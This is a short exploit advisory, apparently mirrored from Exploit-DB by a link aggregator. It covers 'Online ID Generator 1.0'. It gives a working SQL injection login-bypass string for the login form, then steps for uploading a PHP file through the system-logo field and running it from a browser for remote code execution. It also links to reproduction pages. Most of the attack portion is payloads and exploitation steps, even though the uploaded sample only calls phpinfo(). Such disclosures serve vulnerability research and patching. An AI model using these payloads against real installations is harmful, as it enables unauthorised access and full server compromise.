5
[webapps] Online ID Generator 1.0 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51728
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online ID Generator 1.0 - Remote Code Execution (RCE)
## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
STATUS: HIGH-CRITICAL Vulnerability
[+]Bypass login SQLi:
# In login form, for user:
```mysql
nu11secur1ty' or 1=1#
```
[+]Shell Upload exploit:
## For system logo:
```php
<?php
phpinfo();
?>
```
[+]RCE Exploit
## Execution from the remote browser:
```URLhttp://localhost/id_generator/uploads/1693471560_info.php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
## Time spend:
00:10:00
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK